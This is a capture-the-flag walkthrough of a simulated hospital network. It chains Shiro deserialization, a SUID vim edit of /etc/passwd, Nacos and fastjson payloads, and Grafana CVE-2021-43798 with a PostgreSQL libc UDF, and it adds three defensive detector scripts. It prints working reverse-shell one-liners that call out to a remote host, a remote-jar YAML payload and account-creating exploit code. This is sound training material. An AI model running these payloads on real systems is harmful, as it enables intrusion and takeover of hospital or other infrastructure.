Spring and Autumn Cloud Mirror simulation range: Hospital walkthrough

Simulation Target - Hospital

Overview

In this scenario you play a penetration testing engineer hired to test a hospital's network security. The goal is to gain access to every server in order to assess the company's security posture. There are 4 flags in total, spread across the different target machines.

Target Architecture

Information Gathering

The fscan scan returns the following:

Port 8080 hosts a website and exposes a heapdump file; open the /actuator directory:

http://39.99.225.90:8080/actuator

Open the website and log in to the admin backend with weak credentials.

Vulnerability Exploitation

After logging in to the backend, Shiro is detected.

The key cannot be brute-forced, but the heapdump file downloaded earlier contains it:

algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

Brute-force the gadget chain.

Execute a command.

Generate a memory shell and connect to it with AntSword.

Privilege Escalation

Look for files with the SUID bit set: vim.basic is SUID and can therefore edit files as root.

From AntSword, send a reverse shell to the cloud server (VPS):

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

The shell then needs to be upgraded to a fully interactive terminal:

python3 -c "import pty;pty.spawn('/bin/bash')"

script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
export TERM=xterm-256color

Escalate privileges by editing /etc/passwd with vim.basic. First generate a password hash with openssl:

openssl passwd -1 -salt 123 123456

Then append an account to /etc/passwd:

hacker:$1$123$7mft0jKnzzvAdU4t0unTG1:0:0:/root:/bin/bash

flag01

After adding the entry, switch to the new account with su. This server is web01; read flag01 from it.

su hacker

Reference: https://cloud.tencent.com/developer/article/1711865

Internal Network Scanning

Run fscan against the internal network:

172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.236:8009 open
172.30.12.6:8848 open
[*] NetInfo 
[*]172.30.12.6
   [->]Server02
   [->]172.30.12.6
[*] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[*] WebTitle http://172.30.12.5:8080   code:302 len:0      title:None Redirect URL: http://172.30.12.5:8080/login;jsessionid=AA88B536A2B3199D4BB9686F35367F34
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=AA88B536A2B3199D4BB9686F35367F34 code:200 len:2005   title:Medical Management Backend
[*] WebTitle http://172.30.12.6:8848   code:404 len:431    title:HTTP Status 404 – Not Found
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964   title:Hospital Backend Management Platform
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos 
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass 
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file 

Two interesting assets appear in the output:

http://172.30.12.6:8848 poc-yaml-alibaba-nacos poc-yaml-alibaba-nacos-v1-auth-bypass 
http://172.30.12.236:8080 code:200 len:3964   title:Hospital Backend Management Platform

172.30.12.6 runs a Nacos service that still uses the default credentials nacos/nacos, and the application on http://172.30.12.236:8080 uses fastjson.


flag02

Use venom to proxy into the internal network: admin listens on a port on the VPS and the agent connects out to it:

./admin_macos_x64 -lport 9999
./agent_linux_x64 -rhost x.x.x.x(vps ip) -rport 9999

Access the Nacos console:

http://172.30.12.6:8848/nacos/

Read the configuration file:

datasource:
  mysql:
    url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
    username: root
    password: P@ssWord!!!

The rollback history of the db-config entry shows a malicious configuration that loads a jar package; its content is roughly as follows. At first it looked as if the entry had to be rolled back to this configuration, but after resetting the environment several times it turned out that no rollback is needed. The configuration below was entered manually:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://172.30.12.5:802/yaml-payload.jar"]
  ]]
]
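The payload works because the YAML is parsed with a SnakeYAML constructor that resolves `!!` global tags to arbitrary Java classes. A defender can audit stored configuration for such tags, since a datasource config should contain none; the scanner below is an added example, not code from the writeup or from the Nacos project, and its sample config is constructed around the payload above.

```python
"""Scan configuration text (e.g. a Nacos config entry) for SnakeYAML global tags."""
import re
from typing import List, Tuple

# '!!' introduces a global tag that SnakeYAML resolves to a Java class name.
TAG_RE = re.compile(r"!!([A-Za-z_][\w.$]*)")

# Classes used by the payload above; every '!!' tag is reported, these rank highest.
HIGH_RISK = {
    "javax.script.ScriptEngineManager",
    "java.net.URLClassLoader",
    "java.net.URL",
}

# Constructed sample: a benign datasource block followed by the payload shape.
SAMPLE_CONFIG = """\
datasource:
  mysql:
    url: jdbc:mysql://localhost:3306/test?useSSL=false
    username: root
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://172.30.12.5:802/yaml-payload.jar"]
  ]]
]
"""


def find_yaml_tags(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, class name, severity) for every global tag found."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in TAG_RE.finditer(line):
            cls = m.group(1)
            severity = "high" if cls in HIGH_RISK else "review"
            hits.append((lineno, cls, severity))
    return hits


def is_safe_config(text: str) -> bool:
    """A datasource config should carry no global tags at all."""
    return not find_yaml_tags(text)


if __name__ == "__main__":
    for lineno, cls, severity in find_yaml_tags(SAMPLE_CONFIG):
        print(f"line {lineno}: {severity}: {cls}")
```

The durable fix on the application side is to parse untrusted YAML with SnakeYAML's SafeConstructor, which refuses global tags entirely.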

Exploit with tooling.

The malicious payload must be compiled first; reference project: https://github.com/artsploit/yaml-payload

Only AwesomeScriptEngineFactory.java needs to be modified. Since the target is a Windows machine, the payload adds an account; the target server also has port 3389 open.

public AwesomeScriptEngineFactory() {
	try {
		Runtime.getRuntime().exec("net user lca Lca@123 /add");
		Runtime.getRuntime().exec("net localgroup administrators lca /add");
	} catch (IOException e) {
		e.printStackTrace();
	}
}

Then compile it; it must be compiled with Java 1.8:

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

Upload the jar to the web01 server (the one with flag01) and start a Python web server there so that web02 (172.30.12.6) can download the malicious jar. Then use NacosExploitGUI_v3.9 to send the request; the jar path is the URL of the Python web server started on web01:

java -jar NacosExploitGUI_v3.9.jar

web01 receives the request, which shows that 172.30.12.6 has downloaded the malicious payload. Next, verify whether the account was added successfully.

Set up a proxy on the local computer with Proxifier and connect to port 3389.

The connection succeeds; obtain flag02. This server is web02.

Related Nacos vulnerabilities:

Nacos Internal Cluster Raft Deserialization Vulnerability
Nacos JRaft Hessian Deserialization Vulnerability Exploitation Tool


flag03

Another machine has a fastjson vulnerability.

To avoid outbound connections from the target, run the JNDI server on 172.30.12.5 (web01):

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:1389/badNameClass",
        "autoCommit":true
    }
}
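The request above is recognisable on the wire: fastjson's autoType marker `@type` naming a JDBC/JNDI class, plus an `ldap://` data source name. The inspector below is an added example for WAF or log review, not code from the writeup; its sample body is the payload shape above, with class names and the JNDI URL taken from it.

```python
"""Flag fastjson autoType markers and JNDI URLs in a JSON request body."""
import json
from typing import Any, List

# Classes the payload above relies on; a production deny list is far longer.
DENY_CLASSES = {"com.sun.rowset.JdbcRowSetImpl", "java.lang.Class"}
JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://", "iiop://")

# Constructed sample mirroring the request body shown above.
SAMPLE_BODY = """{
  "a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},
  "b": {"@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://localhost:1389/badNameClass",
        "autoCommit": true}
}"""


def inspect(value: Any, path: str = "$") -> List[str]:
    """Walk parsed JSON and return one reason string per suspicious node."""
    reasons: List[str] = []
    if isinstance(value, dict):
        t = value.get("@type")
        if isinstance(t, str):
            verdict = "denied" if t in DENY_CLASSES else "present"
            reasons.append(f"{path}: @type {verdict}: {t}")
        for k, v in value.items():
            if isinstance(v, str) and v.lower().startswith(JNDI_SCHEMES):
                reasons.append(f"{path}.{k}: JNDI URL in value: {v}")
            reasons.extend(inspect(v, f"{path}.{k}"))
    elif isinstance(value, list):
        for i, v in enumerate(value):
            reasons.extend(inspect(v, f"{path}[{i}]"))
    return reasons


def inspect_body(body: str) -> List[str]:
    """Parse then inspect; a body that is not JSON cannot reach fastjson's autoType."""
    try:
        return inspect(json.loads(body))
    except json.JSONDecodeError:
        return []


if __name__ == "__main__":
    for reason in inspect_body(SAMPLE_BODY):
        print(reason)
```

Any `@type` key at all is worth alerting on for an application that never expects one; the real fix is upgrading fastjson and keeping autoType disabled (safeMode).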

The low-level proxy must be enabled in yakit.

Obtain flag03; this machine is web03.


flag04

Reaching the last machine from the local computer requires a two-layer internal network proxy. This machine runs Grafana and PostgreSQL, and Grafana has weak credentials that allow direct login to the backend.

The Grafana backend can execute PostgreSQL statements, which is used to reverse a low-privilege shell to the web03 server:

CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;

select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');
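The CREATE FUNCTION above binds a C function to libc's system(), which only a superuser role may do; a Grafana data source should therefore never use a superuser account. The statement is also visible in PostgreSQL logs once log_statement is at least 'ddl'. The detector below is an added example, not from the writeup; it assumes the default stderr log line format, and its sample lines are constructed around the statement shown above.

```python
"""Detect C-language UDF creation (the libc system() trick above) in PostgreSQL logs."""
import re
from typing import Dict, List

# CREATE [OR REPLACE] FUNCTION <name> ... AS '<library>', '<symbol>' ... LANGUAGE c
C_FUNC_RE = re.compile(
    r"CREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\s+(?P<name>\S+).*?"
    r"AS\s+'(?P<lib>[^']+)'\s*,\s*'(?P<sym>[^']+)'.*?LANGUAGE\s+'?c'?",
    re.IGNORECASE | re.DOTALL,
)
# libc entry points that hand the database process a shell or a new program.
DANGEROUS_SYMBOLS = {"system", "execl", "execve", "popen"}

# Constructed sample log lines (assumed default stderr format, log_statement=ddl or all).
SAMPLE_LOG = [
    "2024-01-01 10:00:00 UTC [123] postgres@postgres LOG:  statement: SELECT version();",
    "2024-01-01 10:00:05 UTC [123] postgres@postgres LOG:  statement: "
    "CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS "
    "'/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;",
    "2024-01-01 10:00:09 UTC [123] postgres@postgres LOG:  statement: select system('id');",
]


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per logged CREATE FUNCTION that loads a C symbol."""
    findings = []
    for line in lines:
        m = C_FUNC_RE.search(line)
        if not m:
            continue
        lib, sym = m.group("lib"), m.group("sym")
        reason = "C-language function created"
        if sym in DANGEROUS_SYMBOLS or "libc" in lib:
            reason = f"C function bound to {sym} in {lib}"
        findings.append({"function": m.group("name"), "library": lib, "symbol": sym, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['function']}: {f['reason']}")
```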

On web03, download https://github.com/A-D-Team/grafanaExp and use that exploit (CVE-2021-43798) to read the account password, then log in to the postgres account:

./grafanaExp exp -u http://172.30.54.12:3000/

The password read out is postgres@123; log in with psql:

psql -h 172.30.54.12 -U postgres -W

postgres=# select version();

-- check whether the current role is a superuser; the administrator's stored password hash is in md5 format
postgres=# SHOW is_superuser;

Crack the hash with hashcat; the password of the root database user is P@ssw0rd123:

hashcat -w 4 -m 0 -a 0 hashfile.txt /usr/share/wordlists/rockyou.txt -O

Then log in as the root user, calling psql by its absolute path:

sudo /usr/local/postgresql/bin/psql

Enter \? to switch to the command line and find flag04.

Reference

https://h0ny.github.io/posts/Hospital-%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/#grafana-unauthorized-arbitrary-file-reading-cve-2021-43798
